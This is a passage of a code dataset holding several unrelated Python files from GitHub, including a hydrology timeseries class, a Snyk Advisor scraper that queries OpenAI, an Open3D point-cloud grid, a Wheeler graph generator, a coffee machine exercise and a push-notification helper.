annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseriesObj.firstday_of_period, years, len(years) * [index])\n #norm.append(FixedIndexTimeseriesObj.timeseries[dates].mean())\n norm.append(self.data_by_index(index).mean())\n if 
type(annualindex) == int:\n return norm[0]\n else:\n return norm\n\n def max(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the max value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the max value should be computed.\n Otherwise the max values for all periods are computed.\n\n Returns:\n A value or list of values describing the maximum in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n out = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseries.firstday_of_period, years, len(years) * [index])\n #out.append(FixedIndexTimeseries.timeseries[dates].max())\n out.append(self.data_by_index(index).max())\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def min(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the min value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the min value should be computed.\n Otherwise the min values for all periods are computed.\n\n Returns:\n A value or list of values describing the minimum in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n out = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n # TODO dates = map(FixedIndexTimeseries.firstday_of_period, years, len(years) * [index])\n #out.append(FixedIndexTimeseries.timeseries[dates].min())\n out.append(self.data_by_index(index).min())\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def stdev_s(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the stdev.sample value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the stdev.sample value should be computed.\n Otherwise the stdev.sample values for all periods are computed.\n\n Returns:\n A value or list of values describing the stdev.sample in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n out = []\n years = range(min(self.timeseries.index).year, max(self.timeseries.index).year + 1)\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n else:\n indexrange = range(1, self.maxindex + 1)\n\n for index in indexrange:\n dates = map(self.firstday_of_period, years, len(years) * [index])\n try:\n out.append(self.timeseries[dates].std())\n except:\n out.append(nan)\n if type(annualindex) == int:\n return out[0]\n else:\n return out\n\n def trend(self, label=None):\n \"\"\"Returns the trend component of the timeseries\n\n Args:\n None\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n None\n \"\"\"\n dec = decompose(self.timeseries.values, period=self.maxindex)\n return FixedIndexTimeseries(pandas.Series(dec.trend, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n def seasonal(self, label=None):\n \"\"\"Returns the seasonal component of 
the timeseries\n\n        Args:\n            None\n        Returns:\n            A FixedIndexTimeseries Object\n\n        Raises:\n            None\n        \"\"\"\n        dec = decompose(self.timeseries.values, period=self.maxindex)\n        return FixedIndexTimeseries(pandas.Series(dec.seasonal, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n    def residual(self, label=None):\n        \"\"\"Returns the residual (timeseries without trend and seasonal component) component of the timeseries\n\n        Args:\n            None\n        Returns:\n            A FixedIndexTimeseries Object\n\n        Raises:\n            None\n        \"\"\"\n        dec = decompose(self.timeseries.values, period=self.maxindex)\n        return FixedIndexTimeseries(pandas.Series(dec.resid, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n    def detrend(self, label=None):\n        \"\"\"Returns the timeseries without trend component\n\n        Args:\n            None\n        Returns:\n            A FixedIndexTimeseries Object\n\n        Raises:\n            None\n        \"\"\"\n        dec = decompose(self.timeseries.values, period=self.maxindex)\n        return FixedIndexTimeseries(pandas.Series(dec.resid, index=self.timeseries.index)+pandas.Series(dec.seasonal, index=self.timeseries.index), mode=self.mode, label=self.label if label is None else label)\n\n    def derivative(self, label=None):\n        \"\"\"Returns the derivative of the timeseries\n\n        Args:\n            None\n        Returns:\n            A FixedIndexTimeseries Object\n\n        Raises:\n            None\n        \"\"\"\n        diff = self.timeseries.diff()\n        delta_days = [(x-y).days for x, y in zip(self.timeseries.index, self.timeseries.index[1:])]\n        derivative = -diff.drop(diff.index[0])/delta_days\n        return FixedIndexTimeseries(derivative, mode=self.mode, label=self.label if label is None else label)\n\n    def downsample(self, mode, label=None):\n        \"\"\"Returns a timeseries with lower frequency than the original\n\n        Args:\n            mode: The mode of the target timeseries. Needs to be of lower frequency than the original timeseries.\n        Returns:\n            A FixedIndexTimeseries Object\n\n        Raises:\n            ValueError: If the timeseries can not be resampled to the requested frequency. Either it is already of the lowest mode=seasonal or the target mode is of higher frequency than the original mode\n        \"\"\"\n        if len(self.mode) > 2:\n            raise ValueError('The timeseries can not be downsampled')\n        if len(mode) > 1:\n            self.__mode_order.append(mode)\n\n        if self.__mode_order.index(mode) <= self.__mode_order.index(self.mode):\n            raise ValueError('The target mode is of same or higher frequency than the source mode. 
Only downsampling is allowed.')\n else:\n dailyindex = pandas.date_range(self.timeseries.index.values[0], self.timeseries.index.values[-1]+datetime.timedelta(self.period+1), freq='D')\n dailytimeseries = self.timeseries.reindex(dailyindex).interpolate('zero',limit=self.period+1).interpolate('linear',limit=self.period+1)\n dummyInstance = FixedIndexTimeseries(pandas.Series(), mode=mode)\n beginyear = self.timeseries.index.values[0].year\n endyear = self.timeseries.index.values[-1].year\n newindex = [dummyInstance.firstday_of_period(y, i) for y in range(beginyear, endyear+1) for i in range(1, dummyInstance.maxindex+1)]\n values = [nan] * len(newindex)\n for i,date in enumerate(newindex):\n lastday = dummyInstance.lastday_of_period(date.year+dummyInstance.yearswitch*1,dummyInstance.convert_to_annual_index(date))\n try:\n values[i] = dailytimeseries.reindex(pandas.date_range(date,lastday,freq='D')).mean(skipna=False)\n except:\n pass\n return FixedIndexTimeseries(pandas.Series(values,newindex),mode=mode, label=self.label if label is None else label)\n\n def multiply(self, FixedIndexTimeseries_obj, label=None):\n \"\"\"Returns the timeseries multiplied by another timeseries\n\n Args:\n A FixedIndexTimeseries Object of the same mode.\n Returns:\n A FixedIndexTimeseries Object\n\n Raises:\n ModeError: If the mode of both timeseries is different.\n \"\"\"\n if self.mode is not FixedIndexTimeseries_obj.mode:\n raise self.__ModeError(\"Both timeseries must be of the same mode\")\n\n res = self.timeseries.multiply(FixedIndexTimeseries_obj.timeseries)\n return FixedIndexTimeseries(res, mode = self.mode, label=self.label if label is None else label)\n\n class __ModeError(Exception):\n pass\n\n\n\nclass FixedIndexTimeseriesCSV(FixedIndexTimeseries):\n \"\"\"Is a subclass of FixedIndexTimeseries. Can be initialised with a path of a csv file.\n\n Description of required csv-file format: rows contain the data of 1 year.\n The first column contains the year of each row. The length of the rows corresponds\n to number of periods of the chosen mode in each year, additional columns will be ignored\n e.g. monthly:\n 1995,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12\n 1996,...\n Strings are loaded as NaN\n\n \"\"\"\n\n def __init__(self, csv_filepath, mode, label=None):\n self.mode = mode\n if mode == 'd':\n self.maxindex = 36\n self.period = 10\n self.periodname = \"decade\"\n elif mode == \"p\":\n self.maxindex = 72\n self.period = 5\n self.periodname = \"pentade\"\n elif mode == \"m\":\n self.maxindex = 12\n self.period = 30\n self.periodname = \"month\"\n elif mode == \"dl\":\n self.maxindex = 365\n self.period = 1\n self.periodname=\"daily\"\n else:\n try:\n res = mode.split(\"-\")\n self.begin = datetime.date(1, int(res[0]), 1)\n self.end = datetime.date(1, int(res[1]) + 1, 1) - datetime.timedelta(1)\n self.maxindex = 1\n self.period = (self.end - self.begin).days\n self.periodname = \"season\"\n except:\n raise ValueError(\"The given mode was not recognized. Check the docstring of the class for details.\")\n\n\n series = self.load_csv(csv_filepath)\n FixedIndexTimeseries.__init__(self, series, mode, label)\n\n def load_csv(self, filepath):\n \"\"\"loads array-like timeseries data from .csv into indexed pandas series\n\n Description of required csv-file format: rows contain the data of 1 year.\n The first column contains the year of each row. The length of the rows corresponds\n to number of periods of the chosen mode in each year, additional columns will be ignored\n e.g. 
monthly:\n 1995,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12\n 1996,...\n Strings are loaded as NaN\n\n Args:\n filepath: the path to a csv file\n\n Returns:\n pandas.Series objects\n\n Raises:\n ValueError: The yearnumber in the first column of the csv could not be recognized.\n \"\"\"\n\n reader = csv.reader(open(filepath, 'r'))\n intlist = []\n datelist = []\n for row in reader:\n for i in range(1, self.maxindex + 1):\n try:\n intlist.append(float(row[i]))\n except:\n intlist.append(nan)\n try:\n date = self.firstday_of_period(year=int(row[0]), annual_index=i)\n except ValueError:\n raise ValueError(\"CSV format error: The first column must contain years\")\n datelist.append(date)\n\n return pandas.Series(data=intlist, index=datelist, name=basename(filepath))\n","repo_name":"hydrosolutions/hydromet-forecasting","sub_path":"hydromet_forecasting/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":25507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9274483396","text":"import json\nimport openai\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport config\nimport time\n\n# Reading the API key from a file\nservice_key = config.api_key\nopenai.api_key = service_key\n\n\ndef handle_answer(q, file_id):\n\ttry:\n\t\tanswer = openai.Answer.create(\n\t\t\tsearch_model=\"davinci\", \n\t\t\tmodel=\"davinci\", \n\t\t\tquestion=q, \n\t\t\tfile=file_id, \n\t\t\texamples_context=\"In 2017, U.S. life expectancy was 78.6 years.\", \n\t\t\texamples=[[\"What is human life expectancy in the United States?\", \"78 years.\"]], \n\t\t\tmax_rerank=200,\n\t\t\tmax_tokens=500,\n\t\t\tstop=[\"\\n\", \"<|endoftext|>\"]\n\t\t)\n\t\t\t\n\texcept Exception as e:\n\t\tanswer = False\n\t\n\treturn answer\n\t\ndef handle_package(pkg_name):\n\t# Get the URL\n\tURL = 'https://snyk.io/advisor/npm-package/' + pkg_name\n\tURL_dep = URL + '#dependencies'\n\tr = requests.get(URL)\n\tr_dep = requests.get(URL_dep)\n\t\n\tif r.status_code == 200:\n\n\t\tsoup = bs(r.text, \"html.parser\")\n\t\tsoup_dep = bs(r_dep.text, \"html.parser\")\n\n\t\t# Parse the HTML for the data\n\t\tdata_set = []\n\t\tdependencies = ['List of package dependencies']\n\n\t\tfor tag in soup.find_all('div', class_='intro'):\n\t\t\tfor ele in tag.find_all('h2'):\n\t\t\t\tmsg = f\"{pkg_name} is {ele.text}\"\n\t\t\t\tdata_set.append(msg)\n\t\tfor tag in soup.find_all('div', class_='number'):\n\t\t\tdata_set.append(tag.text)\n\t\tfor tag in soup.find_all('ul', class_='scores'):\n\t\t\tfor ele in tag.find_all('li'):\n\t\t\t\tdata_set.append(ele.text)\n\t\tfor tag in soup.find_all('dl', class_='stats'):\n\t\t\tfor ele in tag.find_all('div'):\n\t\t\t\ttext = ele.text.replace('\\n', '')\n\t\t\t\ttext = \" \".join(text.split())\n\t\t\t\tdata_set.append(text)\n\t\t# Readme\n\t\tfor tag in soup.find('div', {'id': 'readme'}):\n\t\t\ttext = tag.text.replace('\\n', '')\n\t\t\ttext = \" \".join(text.split())\n\t\t\tdata_set.append(text)\n\t\t# Dependencies\n\t\tfor tag in soup_dep.find_all('div', {'id': 'dependencies'}):\n\t\t\tfor ele in tag.find_all('a'):\n\t\t# print(ele.text)\n\t\t\t\tdependencies.append(ele.text)\n\t\t\t\t\n\t\t# Create list of JSON objects\n\t\tlist_of_jsons = []\n\t\tfor line in data_set:\n\t\t\tjson_obj = {\"text\": line}\n\t\t\tlist_of_jsons.append(json_obj)\n\t\tdep = \", \".join(dependencies)\n\t\tdep_obj = [{'text' : dep, \"metadata\": \"list of package dependencies\"}]\n\n\t\t# Create file with data\n\t\twith open('data.jsonl', 'w') as 
json_file:\n\t\t\tfor ele in list_of_jsons:\n\t\t\t\tjson.dump(ele, json_file)\n\t\t\t\tjson_file.write('\\n')\n\t\t\tfor ele in dep_obj:\n\t\t\t\tjson.dump(ele, json_file)\n\t\t\t\tjson_file.write('\\n')\n\n\t\t# Send file to openAI\n\t\tfile = openai.File.create(file=open(\"data.jsonl\"), purpose='answers')\n\t\ttime.sleep(3)\n\t\tfile_id = file['id']\n\t\treturn file_id\n\telse:\n\t\tprint(\"Package not found\")\n\t\t\n# PACKAGE NAME\npkg_name = input(\"Enter package name: \")\nfile_id = handle_package(pkg_name)\nprint(\"--------------------\")\nprint(\"Type 'exit' to quit.\")\nprint(\"Type 'pkg' to change package.\")\nprint(\"--------------------\")\n# QUESTION:\nq = input(\"Question: \")\n\nwhile q != 'exit':\n\tif q == 'pkg':\n\t\tpkg_name = input(\"Enter package name: \")\n\t\tfile_id = handle_package(pkg_name)\n\t\tq = input(\"Question: \")\n\t# Get an answer\n\tanswer = handle_answer(q, file_id)\n\t\n\tif answer:\n\t\tans = \"\".join(answer['answers'])\n\t\tprint(f\"A: {ans}\")\n\t\tq = input(\"Question: \")\n\telse:\n\t\tprint(\"Couldn't find an answer.\")\n\t\tq = input(\"Question: \")\n\n","repo_name":"awesomner/snyk-explorer","sub_path":"snyker.py","file_name":"snyker.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37465557050","text":"import open3d as o3d\nimport numpy as np\n\n\nclass ReferenceGrid:\n\n def __init__(self, center):\n self.offset = center\n self.spacing = 13e-3\n self.param_long = np.linspace(-100, 100, 1000) * (3 * self.spacing / 100)\n self.param_short = np.linspace(-100, 100, 1000) * (2 * self.spacing / 100)\n self.data = None\n self.pcd = None\n self.is_built = False\n self.pose_graph = None\n self.vertex = None\n\n def generate_vertex(self):\n v = []\n for i in range(-3, 4):\n for j in range(-2, 3):\n for k in range(-2, 3):\n v.append(np.array([i * self.spacing, j * self.spacing, k * self.spacing]))\n v = np.array(v)\n v = self.generate_offset(v)\n self.vertex = o3d.geometry.PointCloud()\n self.vertex.points = o3d.utility.Vector3dVector(v)\n return 0\n\n def generate_offset(self, d):\n for i in range(3):\n d[:, i] += self.offset[i]\n return d\n\n def build(self):\n self.data = []\n\n for i in range(-2, 3):\n x = self.param_long.T\n y = (np.zeros(self.param_long.shape) + i * self.spacing).T\n z = np.zeros(self.param_long.shape)\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, None]), axis=1)\n self.data.append(temp)\n self.data = np.concatenate(self.data)\n new_data = np.copy(self.data)\n for i in range(-2, 3):\n if i != 0:\n new_data[:, 2] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n new_data = []\n for i in range(-2, 3):\n x = np.zeros(self.param_short.shape).T\n y = (np.zeros(self.param_short.shape) + i * self.spacing).T\n z = self.param_short.T\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, None]), axis=1)\n new_data.append(temp)\n new_data = np.concatenate(new_data)\n self.data = np.concatenate((new_data, self.data), axis=0)\n for i in range(-3, 4):\n if i != 0:\n new_data[:, 0] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n new_data = []\n for i in range(-3, 4):\n x = (np.zeros(self.param_short.shape) + i * self.spacing).T\n y = self.param_short.T\n z = np.zeros(self.param_short.shape).T\n temp = np.concatenate((x[:, None], y[:, None]), axis=1)\n temp = np.concatenate((temp, z[:, 
None]), axis=1)\n new_data.append(temp)\n new_data = np.concatenate(new_data)\n self.data = np.concatenate((new_data, self.data), axis=0)\n for i in range(-2, 3):\n if i != 0:\n new_data[:, 2] = self.spacing * i\n self.data = np.concatenate((self.data, new_data), axis=0)\n\n self.is_built = True\n self.data = self.generate_offset(self.data)\n self.generate_vertex()\n print(\"Reference grid built\")\n return 0\n\n def convert(self):\n try:\n self.pcd = o3d.geometry.PointCloud()\n self.pcd.points = o3d.utility.Vector3dVector(self.data)\n print(\"Conversion of grid to point cloud done\")\n except RuntimeError:\n print(\"Error: the grid is not built. Run method build() first.\")\n return 0\n\n def display(self, colour=None):\n if colour is None:\n colour = [0, 1, 0]\n try:\n self.pcd.paint_uniform_color(colour)\n\n ref_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=0.1, origin=[0, 0, 0])\n\n o3d.visualization.draw_geometries([self.pcd, ref_frame])\n except AttributeError:\n print(\"Error: grid should be built and converted before. Use built() then convert() methods.\")\n return 0\n\n def save_point_cloud(self, path=\"\", name=\"\"):\n try:\n o3d.io.write_point_cloud(path + name + \"_full.ply\", self.pcd)\n o3d.io.write_point_cloud(path + name + \"_vertex.ply\", self.vertex)\n print(\"Reference grid and vertices saved as point clouds\")\n except TypeError or AttributeError:\n print(\"Error: the point cloud does not exist. Build it and convert it first\")\n return 0\n\n def register(self, source, max_correspondence_distance_coarse=10e-5, max_correspondence_distance_fine=1.0e-5):\n print(\"Starting full registration with maximum correspondence distance of \" + str(\n max_correspondence_distance_fine * 1000) + \" mm\")\n # Providing an estimation of the normals of target\n self.pcd.estimate_normals()\n\n # Appending a node chosen for world transformation The vector is 4-dimensional in order to consider\n # transformation from one cloud to the other. 
Reader should consider both clouds as corresponding to two time\n # frames if the we see these clouds as being part of geometry acquisition with a movie recorder\n self.pose_graph = o3d.pipelines.registration.PoseGraph()\n odometry = np.identity(4)\n self.pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))\n\n # Creating ICP registration\n icp_coarse = o3d.pipelines.registration.registration_icp(source, self.pcd, max_correspondence_distance_coarse,\n np.identity(4),\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n icp_fine = o3d.pipelines.registration.registration_icp(source, self.pcd, max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n\n # Retaining the fine registration as it is the most precise and getting the corresponding transformation\n transformation_icp = icp_fine.transformation\n information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(source, self.pcd,\n max_correspondence_distance_fine,\n icp_fine.transformation)\n\n # Creating the node and edge transformation\n odometry = np.dot(transformation_icp, odometry)\n self.pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))\n self.pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(0,\n 1,\n transformation_icp,\n information_icp,\n uncertain=False))\n\n # Optimizing the transformation\n option = o3d.pipelines.registration.GlobalOptimizationOption(\n max_correspondence_distance=max_correspondence_distance_fine,\n edge_prune_threshold=0.025,\n reference_node=0)\n o3d.pipelines.registration.global_optimization(\n self.pose_graph,\n o3d.pipelines.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.pipelines.registration.GlobalOptimizationConvergenceCriteria(),\n option)\n\n # Applying the transformation to the target\n # pcd1.transform(pose_graph.nodes[0].pose)\n self.pcd.transform(self.pose_graph.nodes[1].pose)\n self.vertex.transform(self.pose_graph.nodes[1].pose)\n\n print(\"Registration done\")\n print(\"Transformation vector for target:\")\n print(self.pose_graph.nodes[1].pose)\n return self.pose_graph.nodes[1].pose\n","repo_name":"Murnawful/image_distorsion_calculator","sub_path":"irm_dist_calculator/referenceGrid.py","file_name":"referenceGrid.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31588106107","text":"import sys\nimport random\nimport argparse\n\ndef gen_in_node_range(num_nodes, num_labels, root_size):\n grp_size = (num_nodes - root_size) / num_labels\n start = root_size + 1\n ranges = []\n for i in range(num_labels-1):\n # gap = int(grp_size * (1 + random.uniform(-0.05, 0.05))) - 1\n gap = int(grp_size) - 1\n ranges.append((start, start + gap))\n start += gap + 1\n ranges.append((start, num_nodes))\n return ranges\n\ndef split_int(total, group):\n arr = [total // group for i in range(group)]\n arr[-1] += total - sum(arr)\n return arr\n\ndef gen_down(up, start, end, num_node):\n down = [start]\n split_indices = []\n prev = up[0]\n\n for i, elem in enumerate(up[1:]):\n if elem != prev:\n down.append(down[-1])\n split_indices.append(i + 1)\n else: # elem == prev\n down.append(down[-1] + 1)\n prev = elem\n\n assert down[-1] <= end\n\n sample_size = end - down[-1]\n sample_index = random.sample(split_indices, sample_size)\n sample_index = sorted(sample_index)\n\n increm = 0\n it = 0\n for i in 
range(len(down)):\n        if it < len(sample_index) and i == sample_index[it]:\n            increm += 1\n            it += 1\n        down[i] += increm\n\n    assert down[-1] == end\n\n    return down\n\ndef sum_to(n):\n    return sum(list(range(n+1)))\n\ndef get_names(num_nodes, shuffle=True):\n    names = [f'S{i}' for i in range(1, num_nodes+1)]\n    if shuffle:\n        random.shuffle(names)\n    return names\n\ndef create_graph(names, edges, filename):\n    with open(filename, 'w') as f:\n        f.write('strict digraph {\\n')\n        for e in edges:\n            out_node_name = names[e[0] - 1]\n            in_node_name = names[e[1] - 1]\n            label = e[2]\n            f.write(f'\\t{out_node_name} -> {in_node_name} [ label = {label} ];\\n')\n        f.write('}')\n    \ndef uniquify(edges):\n    return list(set(edges))\n\ndef sort(edges):\n    return sorted(edges, key=lambda tup: (tup[2], tup[0], tup[1]))\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Generate Random d-NFA Wheeler Graphs')\n    parser.add_argument('-n', '--nodes', type=int, help='Number of nodes', required=True)\n    parser.add_argument('-e', '--edges', type=int, help='Number of edges', required=True)\n    parser.add_argument('-l', '--labels', type=int, help='Number of edge labels', required=True)\n    parser.add_argument('-r', '--root_size', type=int, default=1, help='Number of nodes without incoming edges (default: 1)')\n    parser.add_argument('-d', '--dnfa', type=int, default=100000, help='d-NFA (default: 100000)')\n    parser.add_argument('-s', '--shuffle', action='store_true', help='Shuffle node names (default: False)')\n    parser.add_argument('-o', '--outfile', type=str, default='tmp.dot', help='Output DOT filename (default: ./tmp.dot)')\n    args = parser.parse_args()\n\n    num_nodes = args.nodes\n    num_edges = args.edges\n    num_labels = args.labels\n    root_size = args.root_size\n    d = args.dnfa\n    outfile_name = args.outfile\n\n    max_num_edge = num_nodes * num_labels + num_nodes - num_labels - root_size\n    assert num_edges <= max_num_edge, f'Impossible to generate WG: max # of edges = {max_num_edge}'\n    assert num_edges >= num_nodes - root_size, f'Impossible to generate WG: min # of edges = {num_nodes - root_size}'\n    assert d is None or d > 0\n\n    nodes = list(range(1, num_nodes+1))\n    edges = []\n\n    in_node_ranges = gen_in_node_range(num_nodes, num_labels, root_size)\n\n    num_edges_per_label = split_int(num_edges, num_labels)\n\n    for l, (in_node_range, num_edge) in enumerate(zip(in_node_ranges, num_edges_per_label)):\n        start, end = in_node_range \n        num_node = end - start + 1\n        assert num_edge >= num_node\n\n        num_node_per_d = [-1] * d\n\n        bound1 = num_edge / sum_to(d)\n        bound2 = (num_node - 1) / sum_to(d - 1) if d > 1 else 1\n\n        if bound1 < bound2:\n            num_node_per_d = [int(bound1)] * d\n            num_node_per_d[-1] += num_edge - int(bound1) * sum_to(d)\n        elif bound2 < bound1:\n            num_node_per_d = [int(bound2)] * (d - 1)\n            num_node_per_d.append( num_edge - int(bound2) * (sum_to(d) - 1) )\n        assert bound1 != bound2\n\n        num_out_nodes = sum(num_node_per_d)\n        assert num_out_nodes <= num_nodes\n\n        # Generate up\n        up = []\n        a1 = random.sample(nodes, num_out_nodes)\n        \n        for i, num in enumerate(num_node_per_d):\n            a2 = random.sample(a1, num)\n            up += a2 * (d - i)\n            for elem in a2:\n                a1.remove(elem)\n        \n        up = sorted(up)\n        down = gen_down(up, start, end, num_node)\n\n        edges += [(a, b, l) for a, b in zip(up, down)]\n\n    edges = uniquify(edges)\n    edges = sort(edges)\n\n    node_names = get_names(num_nodes, shuffle=args.shuffle)\n\n    create_graph(node_names, edges, outfile_name)\n\nif __name__ == '__main__':\n    
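# example invocation using the flags defined above (argument values are illustrative): python gen_d-nfa_WG.py -n 100 -e 300 -l 4 -o graph.dot\n    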
main()\n","repo_name":"Kuanhao-Chao/Wheeler_Graph_Toolkit","sub_path":"generator/Random_generator/gen_d-nfa_WG.py","file_name":"gen_d-nfa_WG.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"10705953440","text":"# converter: converts a number to a Roman numeral\nnumbers={\n    0:\"0\", 1:\"I\", 2:\"II\",3:\"III\",4:\"IV\",5:\"V\"\n}\ndecNum = input(\"Podaj cyfrę 0-5 \")\nif(decNum.isdecimal()):\n    decNum = int(decNum)\n    if (decNum >= 0 and decNum <= 5):\n        print(numbers[int(decNum)])\n    else:\n        print(\"Liczba jest spoza zakresu 0-5\")\nelse:\n    print(\"Błędne dane\")","repo_name":"andrzeji-oss/kursp","sub_path":"dzien2/dzien2_7.py","file_name":"dzien2_7.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3185396700","text":"class CoffeeMachine:\n    water = 400\n    milk = 540\n    beans = 120\n    cups = 9\n    money = 550\n    status = \"standby\"\n\n    def buy(self):\n        coffee_type = input(\"What do you want to buy? 1 - espresso, 2 - latte, 3 - cappuccino\")\n        if coffee_type == \"1\":\n            if self.water >= 250:\n                if self.beans >= 16:\n                    if self.cups >= 1:\n                        print(\"I have enough resources, making you a coffee!\")\n                        self.water -= 250\n                        self.beans -= 16\n                        self.cups -= 1\n                        self.money += 4\n                    else:\n                        print(\"Sorry, not enough cups!\")\n                else:\n                    print(\"Sorry, not enough beans!\")\n            else:\n                print(\"Sorry, not enough water!\")\n\n        elif coffee_type == \"2\":\n            if self.water >= 350:\n                if self.milk >= 75:\n                    if self.beans >= 20:\n                        if self.cups >= 1:\n                            print(\"I have enough resources, making you a coffee!\")\n                            self.water -= 350\n                            self.milk -= 75\n                            self.beans -= 20\n                            self.cups -= 1\n                            self.money += 7\n                        else:\n                            print(\"Sorry, not enough cups!\")\n                    else:\n                        print(\"Sorry, not enough beans!\")\n                else:\n                    print(\"Sorry, not enough milk!\")\n            else:\n                print(\"Sorry, not enough water!\")\n\n        elif coffee_type == \"3\":\n            if self.water >= 200:\n                if self.milk >= 100:\n                    if self.beans >= 12:\n                        if self.cups >= 1:\n                            print(\"I have enough resources, making you a coffee!\")\n                            self.water -= 200\n                            self.milk -= 100\n                            self.beans -= 12\n                            self.cups -= 1\n                            self.money += 6\n                        else:\n                            print(\"Sorry, not enough cups!\")\n                    else:\n                        print(\"Sorry, not enough beans!\")\n                else:\n                    print(\"Sorry, not enough milk!\")\n            else:\n                print(\"Sorry, not enough water!\")\n        else:\n            print(\"\"\"What do you want to buy? 
\n                1 - espresso,\n                2 - latte,\n                3 - cappuccino\"\"\")\n\n    def fill(self):\n        print(\"Write how many ml of water do you want to add:\")\n        water_fill = int(input())\n        self.water += water_fill\n        print(\"Write how many ml of milk do you want to add:\")\n        milk_fill = int(input())\n        self.milk += milk_fill\n        print(\"Write how many grams of coffee beans do you want to add:\")\n        beans_fill = int(input())\n        self.beans += beans_fill\n        print(\"Write how many disposable cups of coffee do you want to add:\")\n        cups_fill = int(input())\n        self.cups += cups_fill\n\n    def take(self):\n        print(\"I gave you ${}\".format(self.money))\n        self.money -= self.money\n\n    def remaining(self):\n        print(\"The coffee machine has:\")\n        print(\"{} of water\".format(self.water))\n        print(\"{} of milk\".format(self.milk))\n        print(\"{} of coffee beans\".format(self.beans))\n        print(\"{} of disposable cups\".format(self.cups))\n        print(\"${} of money\".format(self.money))\n\n    def action(self):\n        print(\"Write action (buy, fill, take, remaining, exit):\")\n        self.status = input()\n        if self.status == \"remaining\":\n            self.remaining()\n        elif self.status == \"buy\":\n            self.buy()\n        elif self.status == \"fill\":\n            self.fill()\n        elif self.status == \"take\":\n            self.take()\n\n\nmachine = CoffeeMachine()\nwhile machine.status != \"exit\":\n    machine.action()\n","repo_name":"HydroVictor/Study_Projects-Jet-Brains-Academy-","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72391611961","text":"import logging\n\nfrom exponent_server_sdk import (\n    DeviceNotRegisteredError,\n    PushClient,\n    PushMessage,\n    PushServerError,\n    PushTicketError,\n)\n\nfrom frux_chat.services.database import database\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setFormatter(\n    logging.Formatter('[%(asctime)s] [%(levelname)s] %(module)s: \"%(message)s\"')\n)\nlogger.addHandler(handler)\nlogger.setLevel(logging.INFO)\n\n\ndef notify_device(token, title='', body='New event!', notification_data=None):\n    logger.info('Sending new notification: -- %s -- %s -- %s', token, title, body)\n    if not notification_data:\n        notification_data = {}\n    try:\n        PushClient().publish(\n            PushMessage(to=token, title=title, body=body, data=notification_data)\n        )\n    except (ValueError, DeviceNotRegisteredError, PushServerError, PushTicketError):\n        pass\n\n\ndef set_tag_and_project(tag, project_id):\n    '''Mix the tag and the project to store in the database'''\n    return f'{tag}_{project_id}'\n\n\ndef notify_tag(tag, project_id, params):\n    # TODO: Bulk notifications/inserts\n    title, body = TAG_MAPPER[tag](params)\n    users = database.get_subscriptions_users(set_tag_and_project(tag, project_id))\n    notification_data = {'project_id': project_id}\n    for user in users:\n        notify_device(user['token'], title, body, notification_data)\n        database.insert_notification(user['_id'], title, body, 